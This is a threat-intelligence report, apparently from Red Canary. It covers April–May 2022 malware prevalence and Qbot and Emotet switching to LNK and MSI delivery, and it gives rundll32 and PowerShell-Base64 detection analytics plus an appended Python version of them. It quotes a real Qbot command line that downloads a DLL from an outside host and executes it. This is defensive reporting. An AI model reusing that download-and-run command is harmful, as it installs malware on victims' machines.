
Intelligence Insights: May 2022

Raspberry Robin leaves tracks, Gootloader returns, and Qbot adopts new tradecraft.

The Red Canary Team

Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.

Highlights

As we’ve done for the past few months, we again looked at the ten most prevalent threats encountered in the environments that Red Canary monitors. These prevalence rankings are based on the number of unique customer environments in which we observed each threat. Here’s how the numbers shook out for April 2022:

| April rank | Threat name | Threat description | Percent of customers affected |
|---|---|---|---|
| 1 | | Collection of Python classes to construct/manipulate network protocols | 1.5% |
| 2 | | Open source tool that dumps credentials using various techniques | 1.3% |
| 3 | | Worm spread by external drives that leverages Windows Installer to download a malicious DLL | 0.8% |
| 4* | | Penetration testing tool that integrates functionality from multiple offensive security projects and leverages a native scripting language | 0.7% |
| 4* | | Banking trojan focused on stealing user data and banking credentials; delivered through phishing, existing Emotet infections, and malicious Windows Installer (MSI) packages | 0.7% |
| 4* | Shlayer | Malware family associated with ad fraud activity through the distribution of adware applications | 0.7% |
| 4* | | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as browser updates to trick users into running malicious code | 0.7% |
| 4* | | Dropper/downloader, often distributed through search engine redirects | 0.7% |
| 9 | Adload | Malware that attempts to change the victim's proxy and redirect web browsers for financial gain | 0.5% |
| 10* | | Open source tool used to identify attack paths and relationships in Active Directory | 0.4% |
| 10* | | Modular banking trojan that primarily functions as a downloader or dropper of other malware; focused on stealing user data and banking credentials; typically distributed through email | 0.4% |
| 10* | Gamarue | Malware family used as part of a botnet; some variants are worms and frequently spread via infected USB drives | 0.4% |

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

**In May 2022, Red Canary began tracking Gootkit as two distinct components, Gootloader and Gootkit. Read our recent blog post for information on the analytic parameters and distinguishing characteristics of each component.

Observations on trending threats

In April, most of our mainstays lingered in the top 10, with one notable newcomer: a relatively new activity cluster we track as Raspberry Robin. Given the volume of Raspberry Robin activity we saw, we published a blog with our research on this threat.

Another curious change is the return of Gootloader, formerly tracked as Gootkit, and the decline of Yellow Cockatoo. As we noted in our April Intelligence Insights, Gootloader and Yellow Cockatoo rely on similar trojanized search engine optimization (SEO) techniques for initial access, and lately they seem to have been taking turns showing up in our detections. While correlation doesn’t equal causation, we’re keeping an eye on what appears to be a pattern between these two prevalent threats.

One final, familiar foe to keep an eye on is our old nemesis Qbot, which still managed to climb up to fourth with a flurry of phishing campaigns at the end of the month.

New Qbot tradecraft

Red Canary recently observed Qbot taking a month off, from the last week of March until April 20, when it resurfaced in our detection data with new observables and new tradecraft.
Though we’ve seen some Qbot operators continue to rely on Microsoft Office documents to deliver malicious droppers during this resurgence, operators have also experimented with at least two new infection vectors.

  • LNK files: In mid-May, multiple customers received phishing emails with malicious ZIP files containing Windows shortcut (LNK) files. If executed, these LNK files run PowerShell commands to download and execute a Qbot DLL payload (see below for a snapshot of a sample command line). This activity has also been reported by threat researchers outside of Red Canary.
“C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe”
iwr hxxps:\\ionbras[.]com[.]br/IrTTog9n5qpa/H.png -OutFile
$env:TEMP\file81.dll;Start-Process rundll32
$env:TEMP\file81.dll,DllInstall

In some of the recent incidents involving LNK files, the Qbot DLL payload was followed quickly by the deployment of Cobalt Strike. We also observed operators using BloodHound, an open source tool used to identify attack paths and relationships in Active Directory, to perform reconnaissance in the compromised environment. The speed at which this activity occurred is concerning, as Qbot, Cobalt Strike, and BloodHound are known ransomware precursors. If you see any Qbot activity, we recommend immediately isolating the machine and starting remediation.

  • MSI Packages: In our April 2022 Intelligence Insights we shared additional details on new Qbot tradecraft observed by threat researchers. For the first time, Qbot operators were observed using Windows Installer (MSI) packages instead of malicious Microsoft Office macros.

The LNK, MSI, and Microsoft Office document delivery methods all result in a regsvr32.exe or rundll32.exe process executing the Qbot DLL and injecting into Windows Explorer. This means that despite differences in delivery tradecraft, many of the same detection analytics still enable defenders to reliably detect Qbot.


Detection opportunity: Rundll32 executing with uncommon export functions

This detector identifies the Windows DLL Host (rundll32.exe) executing with uncommon export functions. Although LNK file use is new to Qbot, logic that detects suspicious attempts to load DLLs can be leveraged to gain visibility into this behavior, regardless of the specific threat.

process == (rundll32)

&&

process_command_line_includes == (dllinstall, dllunregisterserver)


Emotet experiments with new infection TTPs

Following the disruption of its operations and infrastructure in January 2021, Emotet operators resumed activity in late 2021, experimenting with AppX bundles to deliver the malware. Since then, we’ve also seen the operators use different delivery methods, including Excel 4.0 macros, and most recently, shortcut (LNK) files.

In late April, Red Canary observed Emotet operators experimenting with these LNK files to deliver their malware. After a weekend of what appeared to be testing, operators began using the LNK files, effectively replacing the Excel 4.0 macros observed in other recent campaigns. Red Canary observed attempts to deliver these LNK files via phishing emails containing password-protected ZIP files. If executed, the LNK files run PowerShell commands that download and execute a payload from an obfuscated URL.

As operators seek new opportunities to improve delivery, it’s likely the community will see Emotet delivered via additional, non-Office document macro methods. We’ve already begun to see this trend with other malware families like Qbot (see above), and anticipate that Emotet operators will also continue to evolve.


Detection opportunity: Base64 method calls in PowerShell

This detection opportunity identifies the use of .NET methods to convert text to and from Base64 encoding in PowerShell. Adversaries use this tradecraft to obfuscate attempts to execute malicious code on an endpoint and evade command line-based detections. This detection analytic may also identify malicious behavior associated with other threats, like Cobalt Strike.

process == PowerShell.exe

&&

process_command_line == base64
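The two detection opportunities above (rundll32 with uncommon export functions, and Base64 method calls in PowerShell) implemented as checks over process-creation events, as an added example that is not Red Canary's own detector code. The events, the `ProcessEvent` shape, and the temp path in the first sample are constructed; the first sample is modelled on the rundll32 child that the Qbot LNK command line above would produce.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    image: str          # process image name as reported by the EDR (constructed shape)
    command_line: str

# Analytic 1 (from the post): rundll32.exe invoked with export names that
# benign software rarely passes on the command line.
UNCOMMON_EXPORTS = ("dllinstall", "dllunregisterserver")

def rundll32_uncommon_export(ev: ProcessEvent) -> bool:
    if ev.image.lower() != "rundll32.exe":
        return False
    cl = ev.command_line.lower()          # export names are matched case-insensitively
    return any(exp in cl for exp in UNCOMMON_EXPORTS)

# Analytic 2 (from the post): PowerShell command lines calling the .NET
# Base64 conversion methods, e.g. [Convert]::FromBase64String(...).
BASE64_METHOD = re.compile(r"base64", re.IGNORECASE)

def powershell_base64_method(ev: ProcessEvent) -> bool:
    if ev.image.lower() != "powershell.exe":
        return False
    return BASE64_METHOD.search(ev.command_line) is not None

ANALYTICS = {
    "rundll32_uncommon_export": rundll32_uncommon_export,
    "powershell_base64_method": powershell_base64_method,
}

def run_detections(events):
    """Return (analytic name, command line) for every event that fires."""
    return [(name, ev.command_line)
            for ev in events
            for name, check in ANALYTICS.items() if check(ev)]

# Constructed sample events. The first models the child process of
# "Start-Process rundll32 $env:TEMP\file81.dll,DllInstall" with a placeholder temp path.
SAMPLE_EVENTS = [
    ProcessEvent("rundll32.exe", r"rundll32 C:\Users\victim\AppData\Local\Temp\file81.dll,DllInstall"),
    ProcessEvent("rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),   # common export: no hit
    ProcessEvent("powershell.exe", "powershell.exe -nop -w hidden -c "
                 "\"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGVsbG8='))\""),
    # -EncodedCommand never carries the literal text 'base64', so analytic 2 does not
    # fire on it; cover that case with a separate encoded-command analytic.
    ProcessEvent("powershell.exe", "powershell.exe -nop -EncodedCommand QQBCAEMA"),
]

if __name__ == "__main__":
    for name, cl in run_detections(SAMPLE_EVENTS):
        print(f"[{name}] {cl}")
```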

